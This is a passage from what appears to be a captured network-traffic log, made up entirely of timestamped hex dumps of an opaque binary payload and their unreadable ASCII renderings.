                                                Data Ascii: Sh>F>$aA$sZzkTG3"21M@@wsLlI*%iJ_l"{92El:s3,lNA'8'$h]tnoZpf^EZ#$`ueC":`oNT}yk@]"*U<OM(!zH
                                                2021-10-13 18:35:47 UTC40INData Raw: 3e e1 6d 6d 18 72 21 b0 92 f6 3b 11 bb b6 dc 40 95 0f d3 c9 ea 44 dc 5c 77 cf d5 c1 cc a0 9e 90 92 9c 8a 00 4f 66 5e 52 86 1e ff 85 d5 61 71 82 36 9f 05 ad 15 57 8b 4e 2b c7 96 27 9c dd a3 3f 2d d5 20 05 89 40 76 f9 89 e4 05 8a 16 d9 80 8f 4a 63 f9 9c 15 7f d9 4a 09 8c be f3 f5 41 31 62 7b a2 3a 26 f3 dd 84 d4 1a b7 8d 57 d6 07 8e c5 8e 00 7d 68 b6 47 26 e8 35 06 02 fb ce 79 0f a8 83 49 31 8f eb af 2a f0 c7 f0 d1 25 b0 ca 70 ae 0d ba 53 d5 34 df 9f b5 87 80 27 60 60 7b cc c1 3d 05 9e 82 3c 90 5b 57 bc 4c bc 53 c4 b3 80 29 71 91 7b ad 42 40 6f f2 c0 55 d2 62 1b 50 51 cb e5 f6 5c 0d 7d c3 0f 6e e0 3d 0e 28 f1 40 f6 aa 8d 0a 5e 84 91 68 34 2e e8 8c 6a bf 7c 2a ea 2c 53 da 75 97 ba fd d8 98 e7 a8 98 e9 32 53 dc e4 a1 67 f6 c1 cd e6 30 04 e4 2c ee c4 46 b7 ec
                                                Data Ascii: >mmr!;@D\wOf^Raq6WN+'?- @vJcJA1b{:&W}hG&5yI1*%pS4'``{=<[WLS)q{B@oUbPQ\}n=(@^h4.j|*,Su2Sg0,F
                                                2021-10-13 18:35:47 UTC41INData Raw: ae 9d d4 ac bd c1 ce 3a 88 db 8f 42 42 1e 55 c4 47 3a b1 c5 f1 e1 92 40 e5 aa 92 ee 2f 5d ed fa bd 65 da a6 7a b8 60 3f 14 19 db be ea 2c e8 88 03 f9 ee 17 f3 0f 10 56 48 9d d3 15 b8 41 28 04 24 c4 e1 47 28 eb 54 3a 80 17 88 fc 7d 1e d5 93 73 28 3c 8f d7 87 4d 25 4a 54 d5 b6 6e 68 d5 3d 87 67 36 82 35 bf 86 a9 8e ea 3d d3 26 2d 70 07 fb 40 72 bc f4 4b 28 f2 c1 c0 0e 33 18 29 61 0c 95 68 90 f5 55 97 73 ad e4 c5 c2 b8 5e 60 74 84 b2 a4 94 e7 07 5e 72 43 39 0f b1 2c 7d 4c 9b 75 87 ae 6a 07 af 92 53 c7 78 2e f4 fd f8 ff 9c fa df 76 cc 68 e9 63 fc 5f 56 48 1a d0 60 c3 03 cd e1 da 1f a5 14 8f 23 42 a2 c0 fa 63 18 35 19 bc 40 a2 3b ca e9 be 4d 38 b8 f6 9d 70 3c a7 f7 9f 18 25 40 b0 32 a6 8b 40 94 96 cb 0c 5f e2 12 08 86 7d b7 38 8d e5 78 1c fa 36 2b 45 f2 1c fc
                                                Data Ascii: :BBUG:@/]ez`?,VHA($G(T:}s(<M%JTnh=g65=&-p@rK(3)ahUs^`t^rC9,}LujSx.vhc_VH`#Bc5@;M8p<%@2@_}8x6+E
                                                2021-10-13 18:35:47 UTC42INData Raw: 10 38 19 88 c4 53 ce cc a6 99 7f 77 89 7f 96 42 71 8e cb e8 8e d6 66 9c 3a 93 42 3f d4 1c d7 9d c3 6c 1e 7e f9 48 57 1e 84 fe 90 3a 4c ce d0 30 f8 99 72 cb 86 52 73 98 88 c5 03 e9 14 6c 0f f0 c6 be 29 c6 2a e0 24 dd 23 3b 86 76 5e c1 39 73 3d a6 f7 5e c8 76 35 5b f9 8d 1c c8 64 71 b6 09 29 88 e6 b0 ea 2d 64 6d d6 03 52 79 bd d7 80 1f 73 a7 f0 c7 81 11 64 7a 2f 7f f3 4e fb 03 1d 69 bd 6d 56 55 cb e7 0a d2 5c 49 10 cf 6d bc 9f b3 fd df cb e4 0c 60 2d e3 96 01 21 e1 3c 78 3a 8f 4b 86 7e 37 6d 4d 13 82 4e d7 60 06 ff d9 fd 8d b6 c6 d8 ec 5b 4f 22 ab c2 e6 5b 58 e4 4d 89 ad 42 52 fa b8 bc 6c e3 19 13 ae b7 29 5f c7 09 a0 83 a8 b0 3c 70 2c 46 12 17 28 56 6f 34 67 08 50 53 cb ef dd 10 6f 85 5c 84 10 22 33 c1 d2 97 21 54 45 2f 5b fd 52 f6 6f 26 43 01 6b ad a3 3e
                                                Data Ascii: 8SwBqf:B?l~HW:L0rRsl)*$#;v^9s=^v5[dq)-dmRysdz/NimVU\Im`-!<x:K~7mMN`[O"[XMBRl)_<p,F(Vo4gPSo\"3!TE/[Ro&Ck>
                                                2021-10-13 18:35:47 UTC44INData Raw: 7c fc f4 e1 3a 27 fe f2 d8 2f c2 bb e9 b6 bd d7 b2 51 d2 9d 1b f1 73 23 ee 29 6d 95 6c 32 c8 45 be b3 68 01 94 0d 7f f2 7b 66 63 4f 99 6c 16 39 e7 52 a0 36 61 ce 7f b7 3c 75 7d 89 4b 3b 10 1a e1 99 d5 e4 bc 4c a4 75 2a c6 6a 0b ab 0b 88 6e 35 98 eb b8 af c9 c3 d9 96 f1 a1 bc 63 e8 21 5a 65 de 33 9a 95 c7 f0 c0 b5 81 9b 73 8e c3 84 ad 0c 7f b9 77 54 f5 73 6a ec 8e c4 42 b3 00 2a cd 18 d4 28 fd 79 ab 01 b1 1b 7b 38 5a c3 db 97 c8 b1 cd 48 73 cf 8d b7 83 81 a3 13 b4 0a a4 1e d0 70 1c 39 a1 ad 17 8c ee 5d 79 09 92 e4 cc c2 7d b1 23 4e 77 9d 58 f4 26 39 0d a2 bd f1 d7 ef d5 9e 89 a6 40 a4 be 7c 8c 4f e4 fc c5 e0 4d 34 a9 a4 09 77 3f 06 33 ed 73 82 0f d9 28 c3 68 48 b7 d2 8f 25 51 cb e9 0a 43 25 b6 f3 ae 58 06 b4 0d f0 66 c5 a2 1f b7 30 f9 1d 44 12 28 f2 90 93
                                                Data Ascii: |:'/Qs#)ml2Eh{fcOl9R6a<u}K;Lu*jn5c!Ze3swTsjB*(y{8ZHsp9]y}#NwX&9@|OM4w?3s(hH%QC%Xf0D(
                                                2021-10-13 18:35:47 UTC45INData Raw: eb 8f e8 01 a4 b2 22 d3 82 27 7c 8e 1a f6 a6 b3 d5 db 81 59 6d 83 74 21 cb d8 99 6d 84 2a 3f 0e 08 2e d8 e8 99 5c a5 fe 9e 91 81 8a cb d5 b1 05 03 f5 51 c9 f0 23 97 68 ee 18 60 bb 75 c4 44 c2 ae 6e 13 b4 b6 f2 c4 10 56 ed 71 82 15 88 e5 00 83 4f cc 7b 15 75 93 dd 7a 37 eb 14 f0 c2 59 c2 69 ae 8c 7b a5 d8 03 9a 15 91 6d 41 36 d4 e0 5a 54 f3 a2 cd e9 ac bd 2e e4 cf fb dc 60 7e 7b a7 3b 20 6e ed 50 6b a5 82 98 f5 4a a8 24 1d 7d 0e d7 d6 1d 43 26 94 23 08 73 79 d4 05 2b 89 96 f3 54 51 e3 90 c8 cb f1 9d 71 9f e6 52 73 7e ee ce 00 c3 98 e4 96 0e 34 cb e8 d8 9c e5 e8 00 e8 8d 09 9f 1f 45 92 25 57 b9 07 c8 61 52 a7 15 8c fb 58 6d a9 3b 82 08 c6 7e 2a 06 c0 48 5c 40 9a d4 36 b0 34 ae 60 76 35 e9 dc 16 14 1f ce 97 bd cb ee 2a 07 9a c3 ea 9a b3 ea 20 d3 2e 1f 4f 71
                                                Data Ascii: "'|Ymt!m*?.\Q#h`uDnVqO{uz7Yi{mA6ZT.`~{; nPkJ$}C&#sy+TQqRs~4E%WaRXm;~*H\@64`v5* .Oq
                                                2021-10-13 18:35:47 UTC47INData Raw: 82 98 51 c7 ef 6f 08 cb 73 8c ce 94 19 34 1e 6a 1d 54 f1 88 d7 bf 7a eb 2f 7f b6 5a b3 91 72 1e cc 5f 75 6c 9d 66 60 d7 f0 df 91 58 ee 2b fc ea 3d 18 0d 47 ec 40 8a da 1b 6e 99 fe 74 1e c0 bf 07 a6 ab 06 f9 c5 ee 08 c3 d3 86 ce 25 6c e7 21 b2 2c e4 24 c4 5c 5f 9f cf be 46 a3 0c 3e ab 95 d6 a0 27 6b 87 64 a7 75 99 78 30 e3 b3 03 3c 27 cf 5e 61 f4 7b 37 a8 98 eb 55 8d 48 0e 32 18 0d a0 be 10 2f 57 f4 1d 36 67 e3 bd d4 00 97 ea e9 b6 a3 e9 78 0f 47 ea 7a 2c 97 b8 70 f4 4b 12 e8 d7 f7 5e dd 22 4f f4 8c c9 e3 bf d0 cf 58 ff cd f8 df b2 eb aa a7 26 7b 0e fe e9 b6 5d 37 10 99 a3 40 51 24 60 c8 c0 51 ce cd 12 9f 2a c5 ee 22 15 7b b6 a4 74 78 8e e1 01 22 79 a2 8f b8 a9 89 fd 54 58 5f 23 77 8a e4 8f fc 4c aa 84 73 e8 26 c7 cc ea 64 b1 3b 14 89 81 f9 dd 83 59 c0 4c
                                                Data Ascii: Qos4jTz/Zr_ulf`X+=G@nt%l!,$\_F>'kdux0<'^a{7UH2/W6gxGz,pK^"OX&{]7@Q$`Q*"{tx"yTX_#wLs&d;YL
                                                2021-10-13 18:35:47 UTC48INData Raw: d5 26 bb 5e 61 f7 9f 22 cc 7b a3 3e 7e da 72 06 06 0d a7 fe 59 da 16 23 46 83 d4 3f 83 54 41 96 00 78 25 5d fe fd 4f ea a1 d8 03 98 eb 5c b0 8b b0 6c 0d 4d b8 41 28 e2 08 40 8e 6f 22 d4 0c 2a ea 7d bb f4 49 5e f5 49 21 e7 6b 82 dd 27 18 25 4e 47 31 56 65 18 ad 87 50 58 1a c9 ad 25 fc 47 a8 91 67 15 7c d4 d9 8f 4f 41 fe ac ac 95 d0 90 ed 52 50 53 ee 6f 9f a2 88 ca 83 98 f8 3e 27 07 9e 90 f8 c0 63 dc 88 0b 0d bf db 26 27 77 14 2c e4 08 10 9b d3 88 cc 70 4c 83 4c bf c7 5c d5 88 df 96 ee ef a1 39 12 1b 6f 09 89 42 b0 b5 de c8 71 71 54 4b d2 f1 47 3a 95 89 2f 60 55 e3 3d 1c 12 30 f9 ba 97 7b e5 b5 81 0a 13 a1 01 88 8b 47 04 a4 66 de 19 59 6f 49 20 65 4a cd eb be 5a 44 8f 7a ba 73 03 91 7d e3 9e 8c d3 88 2e 4e 59 c1 d5 8a e8 8c 37 0c 1a e4 b2 39 0f b2 a7 f4 fa
                                                Data Ascii: &^a"{>~rY#F?TAx%]O\lMA(@o"*}I^I!k'%NG1VePX%Gg|OARPSo>'c&'w,pLL\9oBqqTKG:/`U=0{GfYoI eJZDzs}.NY79
                                                2021-10-13 18:35:47 UTC49INData Raw: 52 9f 32 cc bf b9 62 f8 52 a1 64 5a e2 81 57 49 2e f4 da 16 12 43 f8 8b 46 a3 06 1d 65 1c 73 7a 2a e6 38 b8 9d 0d 38 85 44 aa 99 a6 fd 65 f8 d8 15 b0 81 01 69 1c cc 69 82 92 bc df 90 ea da 59 cf ac a5 a8 73 30 f3 4e 40 aa a9 85 7c 9a e3 b2 d2 a9 3a 72 f9 fa c6 77 a2 a5 f0 76 86 d4 1a df ac 8c f7 bf 3e 81 b5 36 8c 4d bc d5 99 62 2c e3 4e f0 67 fe f1 56 79 47 83 d9 93 69 94 ce 5d 7f 58 fc f1 4f 86 c6 d8 ee 0f b9 d9 90 cb 52 50 f3 29 ca 4a 5d 02 9e 94 f7 4e 77 8a f3 8e a6 32 e6 c0 d9 8d f4 28 ef 4a a1 ba 88 e1 18 e5 f2 c0 62 99 d7 b1 f7 06 0f 96 e8 2c c7 48 9b ec 33 0a 77 72 fa 0d bb 23 9a e2 c6 ac 4b d9 2a e1 ae be 65 48 72 aa 0f 9a 36 08 bb a1 43 0f 81 00 ae 43 ba 75 8e dd 81 94 92 3e d6 0c 26 e5 ad 15 04 bb 3c 96 e4 22 f8 e3 19 a7 90 ee d5 9d d4 8f fa d6
                                                Data Ascii: R2bRdZWI.CFesz*88DeiiYs0N@|:rwv>6Mb,NgVyGi]XORP)J]Nw2(Jb,H3wr#K*eHr6CCu>&<"
                                                2021-10-13 18:35:47 UTC51INData Raw: d5 05 b1 e5 1a 04 97 b6 ae 98 68 bc f0 88 9c ee e5 36 d3 0a 6d f4 81 b3 3d f5 01 12 32 ee 05 86 b5 24 ef 94 d7 14 8c 8a 0a fe dd 09 71 12 51 95 61 40 07 bf 7d df 07 8e 17 2f 55 45 fb 58 d2 3c c0 fc e6 1c a2 a3 70 25 52 21 77 a5 78 37 94 d0 9d 9a 9c 4c 8c 78 36 e6 de 7c 69 9c 43 8a c3 85 40 fc 79 ed ed d9 5b a2 ef 72 85 97 a9 dd a0 aa 51 18 3e 8b f2 3a 22 76 3a 8b 62 4f 6c a3 07 fe 0e f1 cf c6 fd 29 93 6d 02 df b9 78 e7 9f 2e f0 c2 0f 67 e6 8b f9 3c 4f fb 7a af 5e 5a 78 64 b2 b6 1f f4 a2 bb 52 f3 3e 28 37 a6 ea 98 3b 2e 23 f9 95 0f 89 70 38 05 98 a3 8d 9c f8 47 c9 a6 d7 8a 90 ba 57 49 1b 31 a1 95 51 aa ef 4f 38 dd 40 bd 00 92 58 02 b2 4e bd 34 61 b3 c6 66 15 31 95 f7 05 78 a3 1d f3 fb 48 a1 96 71 c3 10 e7 0c 57 02 b9 b0 36 23 13 fa f6 f6 fa f2 d8 8d af 99
                                                Data Ascii: h6m=2$qQa@}/UEX<p%R!wx7Lx6|iC@y[rQ>:"v:bOl)mx.g<Oz^ZxdR>(7;.#p8GWI1QO8@XN4af1xHqW6#
                                                2021-10-13 18:35:47 UTC52INData Raw: 34 93 93 cf eb b2 d1 dc 9b 46 43 82 83 e2 1b 7b 4e 0b aa ae 89 e3 fe 50 58 5e 56 cc 33 b4 bd c2 7b 36 e8 7d ad 31 0d 66 37 9f a2 3c 84 f2 e1 48 d9 2e 46 dc 86 27 1e 6f 71 f3 d9 6e 72 b1 91 16 2b d6 ea 87 59 c3 db ae 1f ba a6 8b 50 47 02 dd f3 ed 43 2d 7b ac 6a 60 c9 f6 d7 9d 65 53 25 02 03 8d be e0 c8 bf f6 6f 93 34 ad 76 03 96 28 00 37 96 d6 3a 03 73 78 23 59 ee 67 be f5 51 c2 eb 76 35 99 d3 b3 08 ab 81 9a 3b 11 fe 00 a2 2e bf 14 dd c9 bb 95 01 21 0a 7c 05 75 04 b2 22 c4 58 57 dd b4 9f 76 ff 3a 83 4d 34 8b 7a cf 4d 27 62 7d a5 26 cc 9a 16 9a fa dd 9f a5 71 4a b7 3c 70 d7 8a 71 1c 54 49 2d 97 e5 11 f4 d3 31 7e 24 3d b1 39 16 39 bd c4 e5 1b a7 f0 d4 b3 f2 d6 1c c7 08 d1 f5 70 14 2f 62 67 46 7e 2c e7 a4 30 2b a6 93 7f c0 be 24 f7 56 5e 72 a4 4f dd 8f 45 cc
                                                Data Ascii: 4FC{NPX^V3{6}1f7<H.F'oqnr+YPGC-{j`eS%o4v(7:sx#YgQv5;.!|u"XWv:M4zM'b}&qJ<pqTI-1~$=99p/bgF~,0+$V^rOE
                                                2021-10-13 18:35:47 UTC53INData Raw: 96 f8 c2 77 36 76 2f 76 39 3c 0f 5a 47 2a fe ca c6 9f 0a 1e ca 5d 4e 6c 1e cf ef f0 1e bd bf 22 fe e5 ad 33 50 45 4d b7 3a 86 d4 1d 16 32 95 eb 00 11 ae b0 f8 fc 81 40 81 bf df 88 8e c6 85 b6 79 b5 3e 9a 8c 7f f4 d3 51 2f 04 29 70 12 2b 76 2a e4 10 19 74 32 2d 9b 40 08 56 33 0e df d4 de 33 e9 27 dd 78 3c ac 83 69 65 ad 34 32 09 43 2d 6a 0c 97 18 25 bd 61 ea 71 d4 be ff 6d 90 e4 2b 85 9b 27 35 0b 7c db 1a 11 f5 92 d7 86 7a c1 ce 9b 70 15 05 94 ee 49 21 52 03 bb 7b 8c cb d8 b0 4a bd c2 59 ce 41 24 0d 4f 74 3b 4c 18 19 59 f7 ca 26 3e 9a e0 9a 1c cc 70 09 8f 5c 85 40 f0 04 b6 6d 8c 6f c2 4e 44 68 1f 46 b5 26 e7 0f 1e d0 77 af 24 9d 6b b6 01 6c 48 8b 57 dc 2f fc eb a3 13 b1 16 1e 1a e0 ca 87 10 0d a6 92 ce 88 c5 df 9c e5 90 c7 30 d2 51 a0 5e 52 6c df af d5 85
                                                Data Ascii: w6v/v9<ZG*]Nl"3PEM:2@y>Q/)p+v*t2-@V33'x<ie42C-j%aqm+'5|zpI!R{JYA$Ot;LY&>p\@moNDhF&w$klHW/0Q^Rl
                                                2021-10-13 18:35:47 UTC57INData Raw: 7a 3c 7b 46 ea 3e 81 a9 ff 8f 1c d0 73 8e 66 9a 66 7b b4 b6 14 d4 3b 1e c6 67 1a 2c 7e 24 c5 dd 76 93 be 47 28 f8 3c 71 38 90 f5 5c d1 df 22 6a cf f9 ee 27 83 44 b0 a4 21 e4 b8 59 dc 0e 50 9e 8b e2 ce 71 91 63 11 e2 23 4e 08 1a 2b d5 f3 76 3f 1f f7 44 15 55 ad 10 25 5f 0f 9c 64 0a 2b 49 26 04 e2 30 e0 3b aa 70 30 f9 48 a9 3b 58 5f 02 be d5 b6 e8 0a 33 22 47 e0 df 86 d6 b6 7a 25 2c c9 44 f5 1b a3 b5 69 8d 4d 38 e4 1f 58 1a 25 2f fc 27 6c 11 af 74 1a 8a e4 c0 bb fd 7b b2 a5 24 f0 e5 3c 18 ea 21 4a 09 5a 58 e7 0f 9c ea 30 f9 72 36 26 a8 1a c4 5f 56 e5 ee ce 6e 11 4a 0e 6d 8c cd f8 93 6c 0c 23 45 1a fc 5e 8e 08 16 3a 90 d5 b4 9d eb 37 a5 06 1a 28 23 78 c1 6d a5 05 97 70 3e ab c1 61 39 15 a7 ad f2 c5 fa f5 6c e5 3c a0 4a ee ae 1c 73 92 ed 48 b3 18 09 7c c2 59
                                                Data Ascii: z<{F>sff{;g,~$vG(<q8\"j'D!YPqc#N+v?DU%_d+I&0;p0H;X_3"Gz%,DiM8X%/'lt{$<!JZX0r6&_VnJml#E^:7(#xmp>a9l<JsH|Y
                                                2021-10-13 18:35:47 UTC61INData Raw: 8b 8d 38 94 e8 21 b2 75 9d 4c 58 44 ce 5a 7a fe 79 45 67 0c 78 34 b6 53 65 c7 5a 00 03 b2 92 7d 2e 78 3c 82 34 42 89 7e d4 31 83 5b ff 8f 39 1b 16 21 71 b2 23 29 e4 36 99 4a 28 2c 67 f4 d1 1a 8e d5 38 4d 0d 86 22 8a bc 41 10 64 69 a1 e3 d2 4c f5 55 f3 e2 de e3 b8 46 71 a7 02 11 a5 a0 40 97 49 8f 57 ba 18 3c b5 19 d9 87 b9 dc 15 17 67 f3 6a 3b 37 ce a0 af c9 74 f6 77 b4 98 85 8d 65 c9 54 02 18 81 c1 41 c6 15 1e 23 21 51 2d 10 3b 4e 4e a8 ef ec 12 47 9a d2 4b e5 ca f8 a3 3b a3 3e 36 b9 11 c6 cc 63 e7 50 7c 23 f9 7e c5 d9 97 94 0b a3 2a ca 49 ae 9d 87 54 59 ef a5 33 a8 b6 93 f8 eb 31 76 37 b4 de 05 7d 77 f8 68 55 d4 18 da 5d f0 95 69 37 5c 76 98 c7 f4 38 95 55 ac 8d 1a e1 40 b8 03 9a 95 dd de 0b 89 d8 9c 09 99 78 89 41 14 40 70 0e 4f 25 55 ea d2 b4 ba 32 c6
                                                Data Ascii: 8!uLXDZzyEgx4SeZ}.x<4B~1[9!q#)6J(,g8M"AdiLUFq@IW<gj;7tweTA#!Q-;NNGK;>6cP|#~*ITY31v7}whU]i7\v8U@xA@pO%U2
                                                2021-10-13 18:35:47 UTC66INData Raw: 61 2c ca 80 d2 67 6e 11 ad 06 b9 95 e5 a2 9d 94 55 ad 39 9b 6f 96 52 85 51 ef e8 f3 cf e8 32 a3 02 5a 45 c2 b6 bf d4 03 91 52 ff d9 94 4f cb ee ef 75 3a b5 31 6c 12 db 56 62 3d 19 a0 fd bc 71 70 f7 3b 0d ac b7 09 39 7d 49 2d 73 2f c0 24 b3 38 89 4f 21 87 50 73 00 e4 d9 8e db c9 f9 1b 4b 8e 39 14 3a 86 c0 7d 53 28 9d 6d 8a d0 56 65 18 9a e7 ab 3f a7 c3 fb 31 60 85 61 25 77 47 d8 33 9b 63 f1 6d 1c 61 11 b6 a5 ac 62 6b 3f b2 c0 65 5a 5e 65 d1 5d c6 9f 04 0d f8 dc 47 29 df 2d 7a 32 fe fc d2 96 5a 74 b1 2f 6b b6 84 5c 97 7c 38 8c 6a d0 44 22 d5 90 fa cb d1 4e d0 49 fb d1 63 42 89 a9 b9 2a 41 2b 78 3d 07 b9 f2 a3 d8 51 c1 d5 8c d2 51 76 9d ec 20 d0 70 34 ba ad c2 c1 d1 f0 d0 db e7 43 30 f0 22 9e 8e 84 d8 4f cb 0c 90 4b 2a f2 d6 3a f9 93 4f 1f 37 a8 cb e4 0e 26
                                                Data Ascii: a,gnU9oRQ2ZEROu:1lVb=qp;9}I-s/$8O!PsK9:}S(mVe?1`a%wG3cmabk?eZ^e]G)-z2Zt/k\|8jD"NIcB*A+x=QQv p4C0"OK*:O7&
                                                2021-10-13 18:35:47 UTC68INData Raw: a1 01 d3 8c 39 ba 57 c4 52 5c 2f 29 45 b5 d1 7e 33 00 bb 13 b7 8b e0 47 27 62 68 00 3d 2b ff 1a 25 5b e0 79 b6 e8 37 eb 14 34 84 c2 41 13 99 e1 3b 69 96 e0 cc b5 18 96 31 44 7d 1f 88 2b 8f 7a 2b 74 07 c2 4d d9 4f d6 05 9a f6 df d0 77 4c 2f 2a 9f 37 6f 59 eb 5d 47 1c 06 6d c7 ee d6 06 48 e6 6b 84 26 59 c7 e4 2b 6e 38 ac 0f 38 8b 4b 3c 70 de 1a 7f 06 ae b7 3a 90 08 c7 b9 01 35 cf fa c9 e9 ae b6 1d 8c 3a da 12 3f 27 88 fd 71 83 a2 5a 59 db 96 98 25 0c 31 6e 11 a8 af c9 06 01 29 67 f6 fe d0 c0 e7 a7 87 48 b9 52 03 65 e0 3e df 9e 98 e9 a2 65 4c a2 89 4d 39 51 dc 3e 50 fe f8 d1 e8 2c f4 76 14 9a f9 49 6b fe 06 34 0e 63 ef 77 78 42 20 d9 1f e6 c6 7a 35 e7 c0 a4 cf f0 e6 82 17 43 25 59 84 d7 c9 e5 4e fb 69 19 59 c1 e7 9f 9b 3b ae b2 b8 ae 4a b3 93 7a 34 b9 78 91
                                                Data Ascii: 9WR\/)E~3G'bh=+%[y74A;i1D}+z+tMOwL/*7oY]GmHk&Y+n88K<p:5:?'qZY%1n)gHRe>eLM9Q>P,vIk4cwxB z5C%YNiY;Jz4x
                                                2021-10-13 18:35:47 UTC72INData Raw: 3c a5 f4 48 99 b0 90 be 18 d5 a3 57 93 72 46 a5 30 da 89 a8 da 0c 34 3e cb f1 07 93 3f 06 1e 8a dc 44 b3 0c 05 21 55 4a ff 30 e3 b3 74 ab db fd 14 65 e1 fd 79 82 0f 4e 2e e3 35 35 53 c9 e8 6f e1 45 13 c9 a7 1e 89 4f f7 6f 76 56 4a 16 d2 2d 64 7f 0c ed 68 5d 64 6e 0b 2e a9 14 65 e1 94 df 7c 52 5e cb 9c aa 90 ea 7b 1c 68 1a 42 f9 5f a4 99 58 70 ad 42 b6 2f 3c d0 6e 00 56 2f 91 1b 5d 5d 8d 91 27 61 d8 cf 9e 58 42 02 13 52 4a a2 3c 28 28 a9 12 1e 6e ad 9c e5 af c3 f9 9d 52 7a 8e 7e 85 52 50 f6 03 60 a9 60 db 05 9a 11 3e 9a fa c7 0a 74 0d fb 8d 70 8c 8a 99 6e 05 b0 e2 21 11 b2 80 06 8b 8f 0b a9 1d 0e 4d 83 a2 f6 c2 43 33 4b 2c c8 80 40 80 e9 46 d8 0c 21 4c b4 1a 1f b3 2b 6b 3d f3 2a f0 cd fc ab 2b 41 81 01 32 e6 2c 06 a5 62 70 0a 02 27 47 9d c9 05 9e 96 03 55
                                                Data Ascii: <HWrF04>?D!UJ0teyN.55SoEOovVJ-dh]dn.e|R^{hB_XpB/<nV/]]'aXBRJ<((nRz~RP``>tpn!MC3K,@F!L+k=*+A2,bp'GU
                                                2021-10-13 18:35:47 UTC76INData Raw: 43 ee 2c 97 b2 08 7b 75 be ab 56 97 94 92 f5 74 fa 67 54 6c bb 7e cb 05 20 cd f9 8c ea 11 46 1b a6 7b 02 1f 5d fa d9 31 06 05 26 90 e0 04 c1 ab c4 43 f9 38 47 2c e6 2e f4 01 ea a9 02 1c c5 cb 29 02 f8 f4 d3 b8 5a 83 3b 96 a0 9e c5 ca bb a0 06 5a 46 ef 51 1a b3 b7 79 ac 99 69 3a ad 2a 0f 1c c8 70 13 ab 84 a1 4c aa 84 73 28 fc fb 60 6f d2 69 34 af e2 f8 42 81 09 96 a2 ba d8 33 49 20 c9 a7 13 95 f7 74 9d 60 7b 4b f5 78 95 3c 9a ec 69 e1 4a f3 50 f6 d2 cb cd 4b 14 77 9e d0 7d 9d 9d 90 cc 4b 9a bc 03 8a c9 0a 22 33 26 c7 75 43 75 83 5e 59 44 74 41 2b 6c ef d3 65 36 aa 85 a5 82 08 ab 9d d7 cd f4 68 68 80 16 16 a5 ed 04 16 21 b6 71 99 cc a5 42 8b b8 60 7c d5 d0 60 57 e6 00 97 d0 7e 35 1c fe 71 68 40 85 51 7a f1 50 4a 74 fd 00 05 72 52 5d 93 af e0 ba 15 fc 00 37
                                                Data Ascii: C,{uVtgTl~ F{]1&C8G,.)Z;ZFQyi:*pLs(`oi4B3I t`{Kx<iJPKw}K"3&uCu^YDtA+le6hh!qB`|`W~5qh@QzPJtrR]7
                                                2021-10-13 18:35:47 UTC80INData Raw: 90 f3 fb 28 fe fd 69 30 15 52 5d e2 3f ab 5a f9 73 ad c8 97 c5 d1 e3 a1 b7 15 24 47 5b ef 4f c6 85 73 0f 1b 74 07 39 d9 9f bf cc 6d 8f 51 7a 98 3f 1a d2 76 98 2e e2 c2 ce 71 94 ea 54 47 25 4f d8 5b ee 33 01 9d 6c 02 e0 56 cf 4c a7 1b f2 71 d5 e9 d6 09 d0 68 bc af 64 04 64 62 3a 87 a1 22 7d 98 c6 d2 71 29 a5 19 67 c4 01 93 3d 1e 90 e1 99 47 a2 b5 87 4e 40 27 6c 31 4a 2d a3 b6 ba 45 97 13 2a 45 f1 32 da 2d 50 ab b8 71 5f c9 be 48 ce f0 29 8a d8 f5 62 c8 c6 de 66 7a cc de 46 8c bc 4a dd 4e 46 4b 69 84 ca 6a 3d 68 77 b7 8e d5 91 76 2f 4c 9c 18 76 36 5a 47 37 0a 1f a1 0e 32 e7 aa 47 3f 05 90 f5 e8 43 83 83 38 89 52 54 58 40 59 36 8e c4 5d 34 e0 81 8e cd e9 a2 61 d3 25 29 c3 97 7d 63 0b a0 9a e0 8e 32 e7 aa 81 06 0e 39 50 14 80 35 13 fc ab c3 c6 51 9b 3a 24 d7
                                                Data Ascii: (i0R]?Zs$G[Ost9mQz?v.qTG%O[3lVLqhddb:"}q)g=GN@'l1J-E*E2-Pq_H)bfzFJNFKij=hwv/Lv6ZG72G?C8RTX@Y6]4a%)}c29P5Q:$
                                                2021-10-13 18:35:47 UTC84INData Raw: f7 6a 2d 9c 50 6d 5a e5 d3 b6 0b b2 a0 c5 f0 37 24 c5 67 9f 0e 9b cc 6b a3 e8 1e c1 e7 9d 5f 47 09 89 40 88 7e f9 4f f0 ed 65 1b dc 27 b6 57 bb a7 fb 79 a7 47 10 83 71 86 24 aa 86 2d 9b 74 27 df b7 21 73 b5 14 aa 4a b2 be 59 33 d8 13 91 5b d0 9d e4 02 d3 f3 8e 93 1b a8 c5 de a6 80 dd 74 0d 0a 54 58 b7 1f 5c 6c b1 38 97 15 af 64 73 b6 94 76 1a ef 49 23 b1 32 fc 08 dc 02 b7 33 13 93 50 77 4c 1e f7 80 55 06 41 40 23 12 3c 2b 74 f0 e7 a5 f7 16 38 38 e9 aa 9b 97 61 e2 c8 6d cb ef 7d 86 63 54 73 93 66 c6 6c 1f ba 8e cf 49 27 62 50 6f ba fc 78 0c ee a2 5e 26 8b a4 de 02 b2 b6 09 ff 78 c9 b2 af ce 9b 6a 09 72 17 aa a0 9c ae af 05 bf 4f 1e f3 49 35 bb d6 0e ce a0 89 ac af 3f 28 c3 f0 28 72 20 1b 32 2f 22 9b c6 2b 7e d9 84 25 14 37 05 e0 26 5f ef 47 d3 9c b9 ce 5d
                                                Data Ascii: j-PmZ7$gk_G@~Oe'WyGq$-t'!sJY3[tTX\l8dsvI#23PwLUA@#<+t88am}cTsflI'bPox^&xjrOI5?((r 2/"+~%7&_G]
                                                2021-10-13 18:35:47 UTC88INData Raw: 55 fb 48 10 ee ad 3e 99 9c 49 55 8f 59 c5 dd 36 5d f3 75 0a a4 2b 6c 0a a4 46 b2 85 74 2a 56 c6 45 ff 82 f9 96 dd 41 6b a4 8a d1 2c c1 33 97 93 f6 b8 48 b8 49 18 16 0a 73 79 46 1b 24 9c f9 a6 80 ed b1 54 b5 41 ac 71 f2 b9 fa 7f f0 c7 6b d4 55 91 aa 40 b0 75 3a 26 59 91 9b f0 79 29 90 5c 95 2a 33 49 42 89 a3 be 77 73 93 54 bd 60 80 5b 09 a7 26 68 5c 85 9d 63 74 79 58 e0 c4 b0 b3 db 0c bb 78 42 49 44 20 0f 8f df b5 b8 fe b1 8c 43 4d bc 0a c2 25 7d 81 49 78 b5 78 86 02 6e 8b 9e 4c 23 ab a6 e0 55 f2 97 82 1e e1 41 87 1c 05 4d c7 37 cf 58 86 27 8b 89 b8 56 3c 6a cc f7 3c ea b6 42 36 6a 1d 82 ca 77 e9 5e 42 ba cd 81 21 53 dd 56 c7 19 